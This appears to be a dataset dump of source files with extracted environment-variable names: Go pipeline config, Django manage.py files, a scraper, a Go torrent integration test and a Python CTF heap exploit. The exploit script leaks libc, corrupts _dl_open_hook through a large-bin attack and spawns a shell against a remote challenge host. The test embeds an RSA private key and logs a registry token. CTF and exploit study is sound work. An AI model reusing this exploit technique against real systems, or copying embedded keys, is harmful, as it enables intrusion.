Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_username"),
},
{
Name: "password",
ResourceRef: []config.ResourceReference{
{
Name: "gitHttpsCredentialsId",
Param: "password",
Type: "secret",
},
{
Name: "gitHttpsCredentialVaultSecretName",
Type: "vaultSecret",
Default: "gitHttpsCredential",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_password"),
},
{
Name: "filePath",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_filePath"),
},
{
Name: "containerName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_containerName"),
},
{
Name: "containerRegistryUrl",
ResourceRef: []config.ResourceReference{
{
Name: "commonPipelineEnvironment",
Param: "container/registryUrl",
},
},
Scope: []string{"GENERAL", "PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "dockerRegistryUrl"}},
Default: os.Getenv("PIPER_containerRegistryUrl"),
},
{
Name: "containerImageNameTag",
ResourceRef: []config.ResourceReference{
{
Name: "commonPipelineEnvironment",
Param: "container/imageNameTag",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "image", Deprecated: true}, {Name: "containerImage"}},
Default: os.Getenv("PIPER_containerImageNameTag"),
},
{
Name: "chartPath",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{{Name: "helmChartPath"}},
Default: os.Getenv("PIPER_chartPath"),
},
{
Name: "helmValues",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "[]string",
Mandatory: false,
Aliases: []config.Alias{},
Default: []string{},
},
{
Name: "deploymentName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{{Name: "helmDeploymentName"}},
Default: os.Getenv("PIPER_deploymentName"),
},
{
Name: "tool",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: `kubectl`,
},
},
},
Containers: []config.Container{
{Image: "dtzar/helm-kubectl:3.8.0", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "helm"}}}}},
{Image: "dtzar/helm-kubectl:3.8.0", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "kubectl"}}}}},
{Image: "nekottyo/kustomize-kubeval:kustomizev4", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "kustomize"}}}}},
},
},
}
return theMetaData
}
| [
"\"PIPER_commitMessage\"",
"\"PIPER_username\"",
"\"PIPER_password\"",
"\"PIPER_filePath\"",
"\"PIPER_containerName\"",
"\"PIPER_containerRegistryUrl\"",
"\"PIPER_containerImageNameTag\"",
"\"PIPER_chartPath\"",
"\"PIPER_deploymentName\"",
"\"PIPER_commitMessage\"",
"\"PIPER_username\"",
"\"PIPER_password\"",
"\"PIPER_filePath\"",
"\"PIPER_containerName\"",
"\"PIPER_containerRegistryUrl\"",
"\"PIPER_containerImageNameTag\"",
"\"PIPER_chartPath\"",
"\"PIPER_deploymentName\""
]
| []
| [
"PIPER_deploymentName",
"PIPER_commitMessage",
"PIPER_password",
"PIPER_username",
"PIPER_chartPath",
"PIPER_containerImageNameTag",
"PIPER_containerRegistryUrl",
"PIPER_containerName",
"PIPER_filePath"
]
| [] | ["PIPER_deploymentName", "PIPER_commitMessage", "PIPER_password", "PIPER_username", "PIPER_chartPath", "PIPER_containerImageNameTag", "PIPER_containerRegistryUrl", "PIPER_containerName", "PIPER_filePath"] | go | 9 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "istheweatherweird.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
server/viper.go | package server
import (
"os"
"time"
"github.com/joho/godotenv"
)
func (a *API) SetupViper() error {
filename := ".env"
switch os.Getenv("BASEAPI_ENV") {
case "testing":
filename = "../.env.testing"
case "prod":
filename = ".env.prod"
}
err := godotenv.Overload(filename)
if err != nil {
return err
}
a.Config.SetEnvPrefix("baseapi")
a.Config.AutomaticEnv()
a.SetupViperDefaults()
return nil
}
func (a *API) SetupViperDefaults() {
a.Config.SetDefault("redis_max_idle", 80)
a.Config.SetDefault("redis_max_active", 12000)
a.Config.SetDefault("redis_max_timeout", 240*time.Second)
a.Config.SetDefault("redis_cache_expiration", 10)
a.Config.SetDefault("rate_limit_requests_per_second", 5)
a.Config.SetDefault("rate_limit_activated", true)
}
| [
"\"BASEAPI_ENV\""
]
| []
| [
"BASEAPI_ENV"
]
| [] | ["BASEAPI_ENV"] | go | 1 | 0 | |
scraper/Chocolat_scraper.py | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os
import re
chromedriver = "/home/mars/Desktop/Chocolate/chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
driver = webdriver.Chrome(chromedriver)
actions = ActionChains(driver)
driver.get('http://flavorsofcacao.com/chocolate_database.html')
timeout = 20
try:
WebDriverWait(driver, timeout).until(EC.visibility_of_element_located((By.XPATH, '//*[(@id = "spryregion1")]//table')))
except TimeoutException:
print('Timed out waiting for page to load')
driver.quit()
this_table = driver.find_elements_by_xpath('//*[(@id = "spryregion1")]//table')
text_file = open("data.txt", "w")
titles = [text_file.write(x.text) for x in this_table]
text_file.close()
| []
| []
| [
"webdriver.chrome.driver"
]
| [] | ["webdriver.chrome.driver"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vilbert_multitask.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
pwn-urlparse-urlparse2/exploit.py | #!/usr/bin/env python
# coding:utf-8
# Usage: ./exploit.py MODE=remote LOG_LEVEL=warn NOPTRACE NOASLR
from ctf import *
binary = './urlparse'
context.terminal = ['tmux', 'splitw', '-h']
mode = args['MODE'].lower()
code = context.binary = ELF(binary)
if args['LIBDEBUG']:
os.environ['LD_LIBRARY_PATH'] = '/dbg{}/lib'.format(code.bits)
if args['LIBC']:
os.environ['LD_PRELOAD'] = os.path.abspath(args['LIBC'])
libc = code.libc
libc.symbols['main_arena'] = libc.symbols['__malloc_hook'] + 0x10
libc.symbols['one_gadget'] = 0xf1147
def exploit():
if mode == 'remote':
context.noptrace = True
io = remote('47.75.4.252', 10011)
io.recvuntil('sha256(xxxx+')
suffix = io.recvuntil(')', drop=True)
io.recvuntil('== ')
hash_str = io.recvline(keepends=False)
io.sendline(iters.bruteforce(lambda x: sha256sumhex(x + suffix) == hash_str, string.printable[:62], 4, 'fixed'))
elif mode == 'debug':
io = gdb.debug(binary)
io.gdb.c()
else:
io = process(binary)
def create_url(content='', size=None):
assert '\n' not in content
io.sendlineafter('> ', 1)
if size is None:
size = len(content)
if content[-1] == '\0':
content = content[:-1]
else:
size += 1
if len(content) + 1 < size:
content += '\n'
io.sendline(size)
if size > 1:
io.send(content)
def encode_url(idx):
io.sendlineafter('> ', 2)
io.sendline(idx)
def decode_url(idx):
io.sendlineafter('> ', 3)
io.sendline(idx)
def list_url(idx=None):
io.sendlineafter('> ', 4)
if idx is not None:
io.recvuntil('{}: '.format(idx))
def delete_url(idx):
io.sendlineafter('> ', 5)
io.sendline(idx)
def encode(x):
if isinstance(x, int):
x = p64(x)
return '%' + '%'.join(group(2, enhex(x)))
def fill_data(content, size=None):
clip = content.split('\0')
for i in xrange(len(clip), 0, -1):
create_url(' '.join(clip[:i]) + '\0', size)
delete_url(0)
# prepare data for merge
create_url(cyclic(0x8f))
create_url(size=0xffd0)
fill_data(fit({
0x8: 0x10000,
0x10: 0xf0,
}, length=0x30), 0x90)
delete_url(0)
create_url(size=0x100d8) # 0x5555558570a0
create_url(size=0x100) # 0x555555867190
# off by 1
delete_url(1)
encode_url(1)
decode_url(1)
# prepare unsorted bin
create_url(size=0x80)
create_url(size=0x80) # gap
create_url(size=0x400) # 0x5555558571c0
create_url(size=0x80) # gap
create_url(size=0x420) # 0x555555857660
create_url(size=0xf600) # gap
delete_url(5)
# trigger merge
delete_url(5)
# leak address
create_url(size=0x80)
create_url(size=0xa0)
create_url(size=0xa0)
delete_url(1)
list_url(6)
libc.address = unpack(io.recvline(keepends=False), 'all') - libc.symbols['main_arena'] - 0x58
io.recvuntil('7: ')
heap_base = unpack(io.recvline(keepends=False), 'all') - 0x660
info('libc address: %#x', libc.address)
info('heap base address: %#x', heap_base)
delete_url(0)
delete_url(0)
# send 0x411 to large bin (0x5555558571c0)
delete_url(3)
create_url(size=0x440)
delete_url(0)
# use overlap to corrupt previous large bin
fill_data(fit({
0x110: 0x411,
0x120: libc.symbols['_dl_open_hook'] - 0x10,
0x130: libc.symbols['_dl_open_hook'] - 0x20,
}), 0x440)
# send 0x431 to large bin to modify _dl_open_hook (0x555555857660)
delete_url(1)
create_url(size=0x440)
delete_url(0)
# fill value for *_dl_open_hook
create_url(size=0x590)
create_url(fit({0x8: libc.symbols['one_gadget']}), size=0x430)
# trigger
delete_url(4)
io.gdb.attach()
io.gdb.execute('parseheap')
io.gdb.execute('dq 0x555555857000')
io.interactive()
if __name__ == '__main__':
exploit()
| []
| []
| [
"LD_PRELOAD",
"LD_LIBRARY_PATH"
]
| [] | ["LD_PRELOAD", "LD_LIBRARY_PATH"] | python | 2 | 0 | |
tests/scene/test_scene.py | from io import open
import os
import requests
DATA_DIR = os.getenv("TEST_DATA_DIR")
DEEPSTACK_URL = os.getenv("TEST_DEEPSTACK_URL")
API_KEY = os.getenv("TEST_API_KEY")
def test_scene():
image_data = open(os.path.join(DATA_DIR,"scene.jpg"), "rb").read()
assert DEEPSTACK_URL+"/v1/vision/scene" == "http://localhost:80/v1/vision/scene"
response = requests.post(
DEEPSTACK_URL+"/v1/vision/scene",
files={"image": image_data}, data={"api_key": API_KEY}
)
assert response.status_code == 200
response_json = response.json()
#assert response.status_code == 200, "Request failed with error: {}".format(response_json["error"])
assert response_json["success"] == True
assert response_json["label"] == "conference_room"
| []
| []
| [
"TEST_API_KEY",
"TEST_DEEPSTACK_URL",
"TEST_DATA_DIR"
]
| [] | ["TEST_API_KEY", "TEST_DEEPSTACK_URL", "TEST_DATA_DIR"] | python | 3 | 0 | |
torrent/torrent_int_test.go | // +build ci
// N.B. !! In order for a test in this suite to succeed you must do the following config:
// - set the envvar HORIZON_TEST_DOCKER_CREDFILE_PATH to the location of a docker cred file path (like ~/.docker/config.json)
// - execute this test with docker permissions and a working docker instance
package torrent
import (
"bytes"
"flag"
"fmt"
"github.com/boltdb/bolt"
"github.com/open-horizon/anax/config"
"github.com/open-horizon/anax/events"
"github.com/open-horizon/anax/persistence"
"github.com/open-horizon/rsapss-tool/sign"
"io/ioutil"
"net/http"
"net/url"
"os"
"path"
"strings"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
// using a different key to verify Pkg than deployment
const validPkgSigningCert = `-----BEGIN CERTIFICATE-----
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
-----END CERTIFICATE-----`
// from rsapss-tool, not paired with other keys in this file; using an x509 cert to sign and verify the deployment description
var validTestPrivKey = `-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDAzJUe8MrDpOFu8uJT2rKLo0pic0fksDny6RRszKeRF6uz8ewp
9zTox/ZcLAo7q/XRCos3LMxf7aoXdPY2livwmu7S0CvjcmnxOrZGtH7mwy+Ls5UK
WJ5nPZeZoWogMofQJymgpfXyVABm7AnIuA2hHQjmqFqpxcjFi2RLc6bhawIDAQAB
AoGBAIfIjc14sJURbmOBU7zS7aRCoIStxBhftLBLT0NA71LUZO0amMUFgZHgIrXP
nnVgKoPK9Tkqp9V3wK88hJr1MIPOE3Yi4CgHe8eQ8Q5Z62bb1kUa/yc3nn6MI/Uz
Kn6q7wIYjpSpFQHUNeJZJ3hrU6NfYJbiKVHe0n0ip5WkcjUBAkEA7xWP5cA2Dmra
bze9Thn9Twk+M4UEEEGUUAhkq3QKjTaTi2JTUjd6jue9TKSEcGCNd+rMXsiJ5ucX
EZPCjAphYQJBAM5wrVlybYUqPtBTyfdBsvKlVRpXDPekS0U5HoOHi6pYG8xiLFbG
McooADfvEzv2NTHzwozWJT0fx4Re9wMImksCQHuPezTT55v/4TAFcJKCoAVO05Sw
s+7q1YmfLNfnOuTMReiNQl6FSZO9dHm9tKyXWcWV1VVO8uYgnC17XdoeK0ECQHt4
PuXZn5Few/TbuFbu73Va1zyKxhGzLOW5FPv77Ne0HOQv727y2UKcjAzoK6vYRNac
gUa0qc8WG8Ga/sfMtGMCQQCMWudwltirtK4+U9G1phKiSZcew6O/BlMDM1UjjZQQ
nBKZcF0+H62TmtIIHvRm0wTq+nPPTtoEH8NrNwRZZ2hC
-----END RSA PRIVATE KEY-----`
var validTestDeploymentCert = `-----BEGIN CERTIFICATE-----
MIICHTCCAYagAwIBAgIUYqKtvgqzrCoAUi0aX6WViO/RpOYwDQYJKoZIhvcNAQEL
BQAwOjEeMBwGA1UEChMVUlNBUFNTIFRvb2wgdGVzdCBjZXJ0MRgwFgYDVQQDEw9k
ZXZlbG9wbWVudC1vbmUwHhcNMTcxMjAyMTk1ODMyWhcNMjcxMTMwMDc1ODMyWjA6
MR4wHAYDVQQKExVSU0FQU1MgVG9vbCB0ZXN0IGNlcnQxGDAWBgNVBAMTD2RldmVs
b3BtZW50LW9uZTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwMyVHvDKw6Th
bvLiU9qyi6NKYnNH5LA58ukUbMynkRers/HsKfc06Mf2XCwKO6v10QqLNyzMX+2q
F3T2NpYr8Jru0tAr43Jp8Tq2RrR+5sMvi7OVClieZz2XmaFqIDKH0CcpoKX18lQA
ZuwJyLgNoR0I5qhaqcXIxYtkS3Om4WsCAwEAAaMgMB4wDgYDVR0PAQH/BAQDAgeA
MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADgYEAcs5DAT+frZfJsoSKEMOu
WJh0S/UVYC+InMv9iUnPF3f0KjVBXTE45GDG1zxY6SFLpOVskNp9mMkH9PLqDMrb
kWsF7xOtgBrzIaibDeEhhcQvvHb6Yct1bSgYxWpS1oGKicXA9PFyXxigUW2e8+DH
SoxItJkxfl2adAjY2DVzdhY=
-----END CERTIFICATE-----`
func init() {
flag.Set("logtostderr", "true")
flag.Set("v", "4")
// no need to parse flags, that's done by test framework
}
func tConfig(t *testing.T, dir string) *config.HorizonConfig {
workloadStorageDir := path.Join(dir, "workload_storage")
if err := os.MkdirAll(workloadStorageDir, 0755); err != nil {
panic(err)
}
torrentDir := path.Join(dir, "torrent_dir")
if err := os.MkdirAll(torrentDir, 0755); err != nil {
panic(err)
}
dockerCredFile := os.Getenv("HORIZON_TEST_DOCKER_CREDFILE_PATH")
if dockerCredFile == "" {
t.Fatalf("Suite setup failed: envvar HORIZON_TEST_DOCKER_CREDFILE_PATH not set (it must point to a docker config file with creds for summit.hovitos.engineering")
} else {
t.Logf("Using docker cred config file: %v (identified by envvar HORIZON_TEST_DOCKER_CREDFILE_PATH)", os.Getenv("HORIZON_TEST_DOCKER_CREDFILE_PATH"))
}
cfg := config.HorizonConfig{
Edge: config.Config{
DockerEndpoint: "unix:///var/run/docker.sock",
DockerCredFilePath: dockerCredFile,
DefaultCPUSet: "0-1",
TorrentDir: torrentDir,
ServiceStorage: workloadStorageDir,
// DockerCredFilePath: "/config.json",
PublicKeyPath: path.Join(dir, "validpkgcert.pem"),
// consistent with setup()'s dirs
UserPublicKeyPath: path.Join(dir, "userkeys"),
},
}
// now make collaborators instance and assign it to member in this config
collaborators, err := config.NewCollaborators(cfg)
if err != nil {
return nil
}
cfg.Collaborators = *collaborators
return &cfg
}
func setup(t *testing.T) (string, *bolt.DB, error) {
dir, err := ioutil.TempDir("", "container-")
if err != nil {
return "", nil, err
}
db, err := bolt.Open(path.Join(dir, "anax-int.db"), 0600, &bolt.Options{Timeout: 10 * time.Second})
if err != nil {
return dir, nil, err
}
bxRegToken := os.Getenv("HORIZON_TEST_BX_DOCKER_REG_TOKEN")
if bxRegToken == "" {
t.Fatalf("Suite setup failed: envvar HORIZON_TEST_BX_DOCKER_REG_TOKEN not set (it must contain a token for the bluemix-hosted docker registry to authenticated when pulling images stored there)")
} else {
t.Logf("Using bx docker registry token: %v (identified by envvar HORIZON_TEST_BX_DOCKER_REG_TOKEN)", os.Getenv("HORIZON_TEST_BX_DOCKER_REG_TOKEN"))
}
tt := true
ff := false
// add the bluemix registry token as an attribute
attr := &persistence.DockerRegistryAuthAttributes{
Token: bxRegToken,
Meta: &persistence.AttributeMeta{
Id: "bxauth",
Label: "bxauth",
Type: "DockerRegistryAuthAttributes",
SensorUrls: []string{"registry.ng.bluemix.net"},
HostOnly: &tt,
Publishable: &ff,
},
}
if _, err := persistence.SaveOrUpdateAttribute(db, attr, "", false); err != nil {
t.Logf("error persisting bxauth: %v", err)
panic(err)
}
err = ioutil.WriteFile(path.Join(dir, "validpkgcert.pem"), []byte(validPkgSigningCert), 0644)
if err != nil {
return dir, nil, err
}
certpath := path.Join(dir, "userkeys")
if err := os.MkdirAll(certpath, 0755); err != nil {
panic(err)
}
keypath := path.Join(dir, "private")
if err := os.MkdirAll(keypath, 0755); err != nil {
panic(err)
}
err = ioutil.WriteFile(path.Join(certpath, "validdepcert.pem"), []byte(validTestDeploymentCert), 0644)
if err != nil {
return dir, nil, err
}
err = ioutil.WriteFile(path.Join(keypath, "validprivatekey.pem"), []byte(validTestPrivKey), 0644)
if err != nil {
return dir, nil, err
}
return dir, db, nil
}
func tWorker(config *config.HorizonConfig, db *bolt.DB) *TorrentWorker {
tw := NewTorrentWorker("tworker", config, db)
return tw
}
func tMsg(messages chan events.Message, expectedEvent events.EventId, t *testing.T) *events.TorrentMessage {
// block on this read
msg := <-messages
switch msg.(type) {
case *events.TorrentMessage:
m, _ := msg.(*events.TorrentMessage)
if m.Event().Id == expectedEvent {
t.Logf("m: %v", m)
return m
} else {
t.Errorf("Execution failed. Original message: %v, type: %T; WorkloadMessage asserted: %v", msg, msg, m)
return nil
}
default:
t.Errorf("%v", msg)
return nil
}
}
func tCleanup(t *testing.T, worker *TorrentWorker, images []string) {
t.Logf("Cleaning up: %v", images)
for _, image := range images {
err := worker.client.RemoveImage(image)
if err != nil {
t.Errorf("ERROR: cleanup failed for docker image, it was supposed to be there and perhaps wasn't. Expected to find: %v", image)
}
}
}
func Test_Torrent_Event_Suite(suite *testing.T) {
dir, db, err := setup(suite)
assert.Nil(suite, err)
defer os.RemoveAll(dir)
config := tConfig(suite, dir)
worker := tWorker(config, db)
env := make(map[string]string, 0)
ur, _ := url.Parse("http://1DD40.http.tor01.cdn.softlayer.net/horizon-test-ci/4bf023c831cff7924378e79a4c51cd426b1ea442.json")
resp, err := http.Get("http://1DD40.http.tor01.cdn.softlayer.net/horizon-test-ci/4bf023c831cff7924378e79a4c51cd426b1ea442.json.sig")
assert.Nil(suite, err)
assert.EqualValues(suite, http.StatusOK, resp.StatusCode)
defer resp.Body.Close()
sigBytes, err := ioutil.ReadAll(resp.Body)
assert.Nil(suite, err)
images := []string{
"summit.hovitos.engineering/amd64/neo4j:3.3.1", // 189MB
"summit.hovitos.engineering/amd64/clojure:boot-2.7.2-alpine", // 147MB
"ubuntu:yakkety", // 107MB
"registry.ng.bluemix.net/glendarling/x86/cpu:1.2.1", // 9MB
}
var buf bytes.Buffer
for ix, image := range images {
repotag := strings.Split(image, ":")
repo := repotag[0]
var sname string
if strings.Contains(repo, "/") {
sname = strings.Split(repotag[0], "/")[len(repotag)]
} else {
sname = repo
}
buf.WriteString(fmt.Sprintf("\"%s\":{\"image\":\"%s\"}", sname, image))
if ix != len(images)-1 {
buf.WriteString(",")
}
}
deployment := fmt.Sprintf("{\"services\":{%s}}", buf.String())
dSig, err := sign.Input(path.Join(dir, "private", "validprivatekey.pem"), []byte(deployment))
assert.Nil(suite, err)
// N.B. the following tests use this suite setup; there is cleanup between each
suite.Run("Torrent event with torrent url and signature causes Horizon Pkg pull", func(t *testing.T) {
defer tCleanup(t, worker, images)
cfg := events.NewContainerConfig(*ur, string(sigBytes), deployment, dSig, "", "")
cmd := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Pkg fetch test",
})
worker.Commands <- cmd
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
// do it again to make sure the load skip behavior works
cmdAgain := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Pkg fetch test 2 (a clone)",
})
worker.Commands <- cmdAgain
// TODO: consider adding an event that distinguishes this case (already exists in docker images repo) from newly-pulled
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
})
suite.Run("Torrent event without torrent url and signature causes Docker pull (w/ authentication)", func(t *testing.T) {
defer tCleanup(t, worker, images)
emptyUr, _ := url.Parse("")
// N.B. empty torrent URL and empty torrent signature mean docker pull should be used
cfg := events.NewContainerConfig(*emptyUr, "", deployment, dSig, "", "")
cmd := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Authenticated docker pull test",
})
worker.Commands <- cmd
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
})
}
| [
"\"HORIZON_TEST_DOCKER_CREDFILE_PATH\"",
"\"HORIZON_TEST_DOCKER_CREDFILE_PATH\"",
"\"HORIZON_TEST_BX_DOCKER_REG_TOKEN\"",
"\"HORIZON_TEST_BX_DOCKER_REG_TOKEN\""
]
| []
| [
"HORIZON_TEST_DOCKER_CREDFILE_PATH",
"HORIZON_TEST_BX_DOCKER_REG_TOKEN"
]
| [] | ["HORIZON_TEST_DOCKER_CREDFILE_PATH", "HORIZON_TEST_BX_DOCKER_REG_TOKEN"] | go | 2 | 0 | |
pkg/popeye.go | package pkg
import (
"bufio"
